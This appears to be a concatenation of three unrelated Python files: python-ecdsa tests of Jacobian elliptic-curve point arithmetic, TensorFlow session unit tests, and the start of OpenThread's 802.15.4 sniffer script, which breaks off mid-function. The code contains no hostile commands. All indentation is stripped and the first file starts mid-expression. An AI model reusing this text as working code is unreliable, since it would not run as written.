min_value=1, max_value=int(generator_brainpoolp160r1.order())
),
st.integers(
min_value=1, max_value=int(generator_brainpoolp160r1.order())
),
st.lists(
st.integers(
min_value=1, max_value=int(curve_brainpoolp160r1.p() - 1)
),
min_size=2,
max_size=2,
unique=True,
),
)
@example(2, 2, [2, 1])
@example(2, 2, [2, 3])
@example(2, int(generator_brainpoolp160r1.order() - 2), [2, 3])
@example(2, int(generator_brainpoolp160r1.order() - 2), [2, 1])
def test_add_different_scale_points(self, a_mul, b_mul, new_z):
j_g = PointJacobi.from_affine(generator_brainpoolp160r1)
a = PointJacobi.from_affine(j_g * a_mul)
b = PointJacobi.from_affine(j_g * b_mul)
p = curve_brainpoolp160r1.p()
assume(inverse_mod(new_z[0], p))
assume(inverse_mod(new_z[1], p))
new_zz0 = new_z[0] * new_z[0] % p
new_zz1 = new_z[1] * new_z[1] % p
a = PointJacobi(
curve_brainpoolp160r1,
a.x() * new_zz0 % p,
a.y() * new_zz0 * new_z[0] % p,
new_z[0],
)
b = PointJacobi(
curve_brainpoolp160r1,
b.x() * new_zz1 % p,
b.y() * new_zz1 * new_z[1] % p,
new_z[1],
)
c = a + b
self.assertEqual(c, j_g * (a_mul + b_mul))
def test_add_different_scale_points_static(self):
j_g = generator_brainpoolp160r1
p = curve_brainpoolp160r1.p()
a = j_g * 11
a.scale()
z1 = 13
x = PointJacobi(
curve_brainpoolp160r1,
a.x() * z1 ** 2 % p,
a.y() * z1 ** 3 % p,
z1,
)
z2 = 29
y = PointJacobi(
curve_brainpoolp160r1,
a.x() * z2 ** 2 % p,
a.y() * z2 ** 3 % p,
z2,
)
c = a + a
self.assertEqual(c, x + y)
def test_add_point_3_times(self):
j_g = PointJacobi.from_affine(generator_256)
self.assertEqual(j_g * 3, j_g + j_g + j_g)
def test_mul_without_order(self):
j_g = PointJacobi(curve_256, generator_256.x(), generator_256.y(), 1)
self.assertEqual(j_g * generator_256.order(), INFINITY)
def test_mul_add_inf(self):
j_g = PointJacobi.from_affine(generator_256)
self.assertEqual(j_g, j_g.mul_add(1, INFINITY, 1))
def test_mul_add_same(self):
j_g = PointJacobi.from_affine(generator_256)
self.assertEqual(j_g * 2, j_g.mul_add(1, j_g, 1))
def test_mul_add_precompute(self):
j_g = PointJacobi.from_affine(generator_brainpoolp160r1, True)
b = PointJacobi.from_affine(j_g * 255, True)
self.assertEqual(j_g * 256, j_g + b)
self.assertEqual(j_g * (5 + 255 * 7), j_g * 5 + b * 7)
self.assertEqual(j_g * (5 + 255 * 7), j_g.mul_add(5, b, 7))
def test_mul_add_precompute_large(self):
j_g = PointJacobi.from_affine(generator_brainpoolp160r1, True)
b = PointJacobi.from_affine(j_g * 255, True)
self.assertEqual(j_g * 256, j_g + b)
self.assertEqual(
j_g * (0xFF00 + 255 * 0xF0F0), j_g * 0xFF00 + b * 0xF0F0
)
self.assertEqual(
j_g * (0xFF00 + 255 * 0xF0F0), j_g.mul_add(0xFF00, b, 0xF0F0)
)
def test_mul_add_to_mul(self):
j_g = PointJacobi.from_affine(generator_256)
a = j_g * 3
b = j_g.mul_add(2, j_g, 1)
self.assertEqual(a, b)
def test_mul_add_differnt(self):
j_g = PointJacobi.from_affine(generator_256)
w_a = j_g * 2
self.assertEqual(j_g.mul_add(1, w_a, 1), j_g * 3)
def test_mul_add_slightly_different(self):
j_g = PointJacobi.from_affine(generator_256)
w_a = j_g * 2
w_b = j_g * 3
self.assertEqual(w_a.mul_add(1, w_b, 3), w_a * 1 + w_b * 3)
def test_mul_add(self):
j_g = PointJacobi.from_affine(generator_256)
w_a = generator_256 * 255
w_b = generator_256 * (0xA8 * 0xF0)
j_b = j_g * 0xA8
ret = j_g.mul_add(255, j_b, 0xF0)
self.assertEqual(ret.to_affine(), w_a + w_b)
def test_mul_add_large(self):
j_g = PointJacobi.from_affine(generator_256)
b = PointJacobi.from_affine(j_g * 255)
self.assertEqual(j_g * 256, j_g + b)
self.assertEqual(
j_g * (0xFF00 + 255 * 0xF0F0), j_g * 0xFF00 + b * 0xF0F0
)
self.assertEqual(
j_g * (0xFF00 + 255 * 0xF0F0), j_g.mul_add(0xFF00, b, 0xF0F0)
)
def test_mul_add_with_infinity_as_result(self):
j_g = PointJacobi.from_affine(generator_256)
order = generator_256.order()
b = PointJacobi.from_affine(generator_256 * 256)
self.assertEqual(j_g.mul_add(order % 256, b, order // 256), INFINITY)
def test_mul_add_without_order(self):
j_g = PointJacobi(curve_256, generator_256.x(), generator_256.y(), 1)
order = generator_256.order()
w_b = generator_256 * 34
w_b.scale()
b = PointJacobi(curve_256, w_b.x(), w_b.y(), 1)
self.assertEqual(j_g.mul_add(order % 34, b, order // 34), INFINITY)
def test_mul_add_with_doubled_negation_of_itself(self):
j_g = PointJacobi.from_affine(generator_256 * 17)
dbl_neg = 2 * (-j_g)
self.assertEqual(j_g.mul_add(4, dbl_neg, 2), INFINITY)
def test_equality(self):
pj1 = PointJacobi(curve=CurveFp(23, 1, 1, 1), x=2, y=3, z=1, order=1)
pj2 = PointJacobi(curve=CurveFp(23, 1, 1, 1), x=2, y=3, z=1, order=1)
self.assertEqual(pj1, pj2)
def test_equality_with_invalid_object(self):
j_g = PointJacobi.from_affine(generator_256)
self.assertNotEqual(j_g, 12)
def test_equality_with_wrong_curves(self):
p_a = PointJacobi.from_affine(generator_256)
p_b = PointJacobi.from_affine(generator_224)
self.assertNotEqual(p_a, p_b)
def test_pickle(self):
pj = PointJacobi(curve=CurveFp(23, 1, 1, 1), x=2, y=3, z=1, order=1)
self.assertEqual(pickle.loads(pickle.dumps(pj)), pj)
@settings(**NO_OLD_SETTINGS)
@given(st.integers(min_value=1, max_value=10))
def test_multithreading(self, thread_num):
# ensure that generator's precomputation table is filled
generator_112r2 * 2
# create a fresh point that doesn't have a filled precomputation table
gen = generator_112r2
gen = PointJacobi(gen.curve(), gen.x(), gen.y(), 1, gen.order(), True)
self.assertEqual(gen._PointJacobi__precompute, [])
def runner(generator):
order = generator.order()
for _ in range(10):
generator * randrange(order)
threads = []
for _ in range(thread_num):
threads.append(threading.Thread(target=runner, args=(gen,)))
for t in threads:
t.start()
runner(gen)
for t in threads:
t.join()
self.assertEqual(
gen._PointJacobi__precompute,
generator_112r2._PointJacobi__precompute,
)
@pytest.mark.skipif(
platform.system() == "Windows",
reason="there are no signals on Windows",
)
def test_multithreading_with_interrupts(self):
thread_num = 10
# ensure that generator's precomputation table is filled
generator_112r2 * 2
# create a fresh point that doesn't have a filled precomputation table
gen = generator_112r2
gen = PointJacobi(gen.curve(), gen.x(), gen.y(), 1, gen.order(), True)
self.assertEqual(gen._PointJacobi__precompute, [])
def runner(generator):
order = generator.order()
for _ in range(50):
generator * randrange(order)
def interrupter(barrier_start, barrier_end, lock_exit):
# wait until MainThread can handle KeyboardInterrupt
barrier_start.release()
barrier_end.acquire()
os.kill(os.getpid(), signal.SIGINT)
lock_exit.release()
threads = []
for _ in range(thread_num):
threads.append(threading.Thread(target=runner, args=(gen,)))
barrier_start = threading.Lock()
barrier_start.acquire()
barrier_end = threading.Lock()
barrier_end.acquire()
lock_exit = threading.Lock()
lock_exit.acquire()
threads.append(
threading.Thread(
target=interrupter,
args=(barrier_start, barrier_end, lock_exit),
)
)
for t in threads:
t.start()
with self.assertRaises(KeyboardInterrupt):
# signal to interrupter that we can now handle the signal
barrier_start.acquire()
barrier_end.release()
runner(gen)
# use the lock to ensure we never go past the scope of
# assertRaises before the os.kill is called
lock_exit.acquire()
for t in threads:
t.join()
self.assertEqual(
gen._PointJacobi__precompute,
generator_112r2._PointJacobi__precompute,
)
|
session_test.py | """Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
import tensorflow.python.platform
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import config_pb2
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import types
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import constant_op
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
# NOTE(mrry): Dummy shape registration for op used in the tests.
ops.RegisterShape('ConstructionFails')(None)
class SessionTest(test_util.TensorFlowTestCase):
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(np.asarray(10.0, dtype=np.float32), copy_val)
def testManyCPUs(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(types.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testOpConstructionErrorPayload(self):
with session.Session():
failing_op = ops.get_default_graph().create_op(
'ConstructionFails', [], [], name='f')
def exc_predicate(e):
return (e.op == failing_op
and e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
failing_op.run()
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
# pylint: disable=protected-access
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(types.float32)
# pylint: enable=protected-access
def exc_predicate(e):
return (e.op == c.op
and e.op._original_op == b.op
and e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
constant_op.constant(indices),
constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.shape)
sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.shape, shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.Variable(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals('', sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEquals(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEquals(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEquals(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session():
for dtype in [types.float32,
types.float64,
types.int32,
types.uint8,
types.int16,
types.int8,
types.int64,
types.bool,
types.complex64]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == types.bool:
np_array = np_array > 0
elif dtype == types.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
out_t.eval(feed_dict={feed_t: np_array}))
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([str(i) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([str(i) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=types.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(c.eval(feed_dict={feed_t: c_list}), c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = ['\n\x01\x00', '\n\x00\x01']
feed_t = array_ops.placeholder(dtype=types.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [u'\n\x01\x00', u'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=types.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0].decode('utf-8'))
self.assertEqual(c_list[1], out[1].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
self.assertEqual(c_list[0], out[0].decode('utf-8'))
self.assertEqual(c_list[1], out[1].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaises(RuntimeError):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
if __name__ == '__main__':
googletest.main()
|
sniffer.py | #!/usr/bin/env python3
#
# Copyright (c) 2016-2017, The OpenThread Authors.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Sniffer tool that outputs raw pcap.
Real-time stream to wireshark:
./sniffer.py | wireshark -k -i -
Save stream to file or pipe:
./sniffer.py > trace.pcap
"""
import sys
import optparse
import time
import os
import threading
from datetime import datetime
import spinel.util as util
import spinel.config as CONFIG
from spinel.const import SPINEL
from spinel.codec import WpanApi
from spinel.stream import StreamOpen
from spinel.pcap import PcapCodec
if sys.platform == 'win32':
import ctypes
import msvcrt
# Nodeid is required to execute ot-ncp-ftd for its sim radio socket port.
# This is maximum that works for MacOS.
DEFAULT_NODEID = 34 # same as WELLKNOWN_NODE_ID
DEFAULT_CHANNEL = 11
DEFAULT_BAUDRATE = 115200
DLT_IEEE802_15_4_WITHFCS = 195
DLT_IEEE802_15_4_TAP = 283
def parse_args():
""" Parse command line arguments for this applications. """
args = sys.argv[1:]
opt_parser = optparse.OptionParser()
opt_parser.add_option("-u", "--uart", action="store",
dest="uart", type="string")
opt_parser.add_option("-b", "--baudrate", action="store",
dest="baudrate", type="int", default=DEFAULT_BAUDRATE)
opt_parser.add_option("--rtscts", action="store_true",
dest="rtscts", default=False),
opt_parser.add_option("-p", "--pipe", action="store",
dest="pipe", type="string")
opt_parser.add_option("-s", "--socket", action="store",
dest="socket", type="string")
opt_parser.add_option("-n", "--nodeid", action="store",
dest="nodeid", type="string", default=str(DEFAULT_NODEID))
opt_parser.add_option("-d", "--debug", action="store",
dest="debug", type="int", default=CONFIG.DEBUG_ENABLE)
opt_parser.add_option("-x", "--hex", action="store_true", dest="hex")
opt_parser.add_option("-o", "--output", action="store",
dest="output", type="string")
opt_parser.add_option("-c", "--channel", action="store",
dest="channel", type="int", default=DEFAULT_CHANNEL)
opt_parser.add_option('--crc', action='store_true',
dest='crc', default=False)
opt_parser.add_option('--rssi', action='store_true',
dest='rssi', default=False)
